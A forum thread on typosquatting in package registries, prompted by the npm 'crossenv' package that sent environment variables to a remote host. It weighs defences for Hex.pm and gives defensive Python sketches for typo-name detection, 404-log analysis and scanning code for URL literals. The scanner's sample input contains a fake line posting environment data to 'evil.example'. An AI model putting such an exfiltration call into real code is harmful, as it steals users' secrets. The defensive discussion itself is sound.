Does Hex.pm have any protection against the recent Node.js package manager security issues (packages with similar/hyphenated names)?

Source: https://news.ycombinator.com/item?id=14901566


The gist of it is that someone wrote code to HTTP POST environment variables (AWS keys, Mailinator keys, etc.) to a remote location. They published it as crossenv, when the real package is cross-env.

Lots of people affected.

I’m just wondering: what does https://hex.pm have in place for something like this? It sounds like a really hard problem to solve with code. As I see it, it can only be solved by having people manually vouch for non-abusive libraries.

Nothing currently; I’m not sure what could be done that would work well.

Could do something like put first-time uploaders into a confirmation queue, but manually going over their code would suck and it would not help when it is someone’s second package.

Could do signed packages where you put some kind of signature into the :dep to confirm it is from the author and not someone else, but people will just end up copy/pasting those anyway.

Could require a minimum number of people to ‘vouch’ for a dependency before it can be auto-grabbed by mix, but that harms newbies and/or library authors that don’t interact with the overall community, which really really harms the ability for people to contribute.

At the very least I think hex.pm needs a commenting system and a flagging system for each package, so people can talk about issues they see in it and, if necessary, flag it so admins can look at the conversation and remove the package if warranted. That will not pre-catch such things, but catching them ‘eventually’ is better than never.

Even after a nasty package like that is removed, the next time mix fetches and verifies deps it needs to display a very loud, red message telling the user to remove the withdrawn dep.


There’s been a bachelor’s thesis on this: incolumitas.com – Typosquatting programming language package managers (link to the author’s blog; the thesis can be found there).

She suggests:

Prevent Direct Code Execution on Installations: This one is easy. Make sure that the software that unpacks and installs a third-party package (pip or npm) does not allow the execution of code that originates from the package itself. The library code should be executed only when the user explicitly loads the package.

Generate a List of Potential Typo Candidates: Generate Levenshtein distance candidates for the N most downloaded packages of the repository and alert administrators when such a candidate is registered.

Analyze 404 Logfiles and Prevent Registration of Often Shadow-Installed Packages: Whenever a user makes a typo while installing a package and the mistyped name is not registered yet, a 404 logfile entry is created on the repository server (because the install HTTP request targets a non-existent resource). Parse these failed installations and block registration of all names that are shadow-installed more often than a reasonable threshold per month.
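To make the typo-candidate suggestion concrete, here is a minimal Python sketch, not anything taken from the thesis or from Hex itself. The function names (`levenshtein`, `typo_candidates`), the `max_distance` default, and the sample package lists are all made up for illustration.

```python
def levenshtein(a: str, b: str) -> int:
    """Edit distance counting insertions, deletions and substitutions."""
    if len(a) < len(b):
        a, b = b, a
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(min(
                previous[j] + 1,         # delete char_a
                current[j - 1] + 1,      # insert char_b
                previous[j - 1] + cost,  # substitute (or keep) the character
            ))
        previous = current
    return previous[-1]


def typo_candidates(new_name, popular_names, max_distance=1):
    """Return the popular names that new_name is suspiciously close to.

    max_distance is an assumed threshold; a real registry would tune it.
    """
    normalized = new_name.lower()
    hits = []
    for name in popular_names:
        target = name.lower()
        if normalized == target:
            continue  # an exact match is the package itself, not a typo
        if levenshtein(normalized, target) <= max_distance:
            hits.append(name)
    return hits


# Names taken from this thread; the "popular" lists are invented.
print(typo_candidates("crossenv", ["cross-env", "mongoose"]))
print(typo_candidates("creto", ["credo", "ecto"]))
```

A check like this only produces candidates for a human to look at. Short names sit within distance 1 of many legitimate packages, so blocking automatically on the result would reject plenty of honest uploads.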

To which I can add:

  • Suspect packages whose source code contains a literal URL or DNS name (it might be a way to send the information back)

I agree that while suspicious packages should be reviewed, all packages should be allowed by default.


That is not a bad idea: have the hex.pm server listen for 404 package requests (I don’t know if it can with its file-serving setup) and add those to a list for an admin to look at to see if they should be ‘locked’ or something, hmm…
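As a rough illustration of the 404 idea, the Python sketch below counts failed package lookups and reports the names that cross a threshold. The log line format, the `/packages/<name>` path, and the threshold are assumptions made for this example; I don't know what hex.pm's real access logs look like.

```python
import re
from collections import Counter

# Hypothetical access-log line: "<timestamp> GET /packages/<name> <status>"
LOG_LINE = re.compile(r"GET /packages/(?P<name>[a-z0-9_\-]+) (?P<status>\d{3})")


def shadow_installed(log_lines, threshold=3):
    """Return names requested but not found at least `threshold` times."""
    misses = Counter()
    for line in log_lines:
        match = LOG_LINE.search(line)
        if match and match.group("status") == "404":
            misses[match.group("name")] += 1
    return sorted(name for name, count in misses.items() if count >= threshold)


sample_log = [
    "2017-08-01T10:00:00 GET /packages/creto 404",
    "2017-08-01T10:05:00 GET /packages/credo 200",
    "2017-08-02T09:00:00 GET /packages/creto 404",
    "2017-08-03T14:30:00 GET /packages/creto 404",
    "2017-08-03T15:00:00 GET /packages/bolton 404",
]
print(shadow_installed(sample_log))
```

The resulting list would go to an admin for review, as suggested above, rather than locking names automatically.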

That looks like an interesting thesis. It would be cool if someone implemented some of her suggestions in hex.pm, which is possible because hex.pm is open source.


Arch Linux approached this problem by creating a two-tier system. Packages start in the use-at-your-own-risk Arch User Repository (AUR). I would call AUR packages intentionally awkward, as there is an outlined protocol forcing you to build the package yourself (PKGBUILD) locally before you can install it with the package manager, maximizing the opportunity for you to review the code before actually being able to use its contents.

Only the highest rated/voted packages then later become part of the community repository that can be more mindlessly and directly managed via pacman.

In a way the hassle of dealing with AUR packages encourages satisfied package users to vote to have the package migrated in order to make keeping it updated more convenient.

Meanwhile the actual community repository already contains enough packages to keep most new users busy for a while before they need to use something from the AUR.


I do not think that such packages are pulled in easily. With npm it is a common pattern to download a dep and edit the package description from the CLI using npm tooling; I think this is where the typos come in. With Hex, though, we have to look up the latest version on hex.pm to get the dependency tuple correct (no one uses >= 0.0.0 just to get started quickly, I hope).

When one makes a typo in the Hex search, one will realize that the version information is somewhat off (only one version of creto available? I started using it with 0.3, now there’s only 0.7? Haven’t I read some release notes about 0.8? Oh, it has to be spelled credo!).

I’m not saying we do not need countermeasures, though; I’d be glad if signed packages were available. That would be a major selling point for Elixir at my day job…

Also, I like the idea of community-flagged packages. If there are too many flags on a package, it will be hidden until it has been reviewed by the staff/trusted community members. I’m not proposing up- and downvoting here!

I’m not sure about the idea of dividing Hex into first- and second-class packages. This makes it hard to discover new packages or to get clearance to use them in business projects. (At least I have to assume so, since I’m currently working closely with devops and I always have trouble when I need something that is not in the CentOS core repositories; even getting something from EPEL is hard.)


edit

According to a discussion I read on Twitter, they also tried to “hijack” the mongoose package. But I do not remember how they typo’d it, nor am I able to find the Twitter discussion I read on the bus this morning.

The last time this vulnerability [1] was reported, we added some protections against it. We discussed possible solutions with the author of the thesis and decided that for Hex the best solution was to add a Levenshtein check that runs once a day and compares new package names against existing ones. If a package name looks like a possible typo attack, we investigate it.

[1] incolumitas.com – Typosquatting programming language package managers


The real package is cross-env, not the malicious package.

Could Hex make a point to flag code that contacts other servers or IP addresses? Seems like if something like that unexpectedly appeared it would be more noticeable.

How do you want to detect that? Sometimes we even want to connect to other servers to fetch data or push it. That’s the whole selling point of distributed applications: the ability to communicate with each other…

In 3rd party packages. If you detect it in code from a library where it’s not expected it could make something like that more obvious.

How should a program know whether a certain thing is expected or not? Perhaps it is part of the build that I submit some data to an HTTP server, generate a file, download it, and generate some functions from it? Similar to how the RegEx module is built, but with a server-generated file. Of course, I’d not write something like that for a public library, because it would depend on infrastructure which I would then need to maintain, but for some internal tooling I have already built similar stuff.

A program shouldn’t, a developer should.

If I add a new package to my application and Hex highlights 5 references in the code base to specific domains or IP addresses being connected to, I would know whether or not that is expected behavior. Unless I’m actually pulling in a package that is explicitly supposed to connect me to a 3rd party API, that would be unexpected behavior and a pretty big red flag.

If I’m pulling in something like Boltun to take advantage of LISTEN/NOTIFY on my Postgres database, but somebody decides to squat on Bolton, this could happen. If I pull in the package with that typo and see that there’s a call out to a specific IP address inside… that’s going to set off alarm bells. This is just supposed to work between Elixir and my database; there shouldn’t be any other connections.

It would be an extra layer of automated and visible community review for when things like this happen. It wouldn’t stop this stuff from happening, but it would help to make more people aware more quickly if it did.
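For what it's worth, the kind of highlighting described here could start out as a plain text scan. The Python sketch below is a naive illustration, not a Hex feature: `network_references` and both patterns are invented for this example, it only finds literal URLs and IPv4 addresses, and anything assembled at runtime or obfuscated slips straight past it.

```python
import re

# Deliberately simple patterns; both will miss obfuscated addresses.
URL = re.compile(r"https?://[^\s\"'<>)]+")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def network_references(source: str):
    """Return the sorted, unique URL and IPv4 literals found in source text."""
    found = set(URL.findall(source))
    for candidate in IPV4.findall(source):
        # Keep only dotted quads whose parts are valid octets (0-255).
        if all(int(part) <= 255 for part in candidate.split(".")):
            found.add(candidate)
    return sorted(found)


# Made-up package source using documentation-reserved addresses.
package_source = '''
post("http://evil.example/collect", env)
connect("203.0.113.7", 80)
'''
for reference in network_references(package_source):
    print(reference)
```

A list like this shown next to a package gives a developer something to eyeball. It also flags harmless things, such as documentation links or four-part version strings, so it can only ever be a hint.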

This is impossible to detect automatically. You would need a full security audit to do this reliably.


My bad, totally unintentional. I’ll update my first post.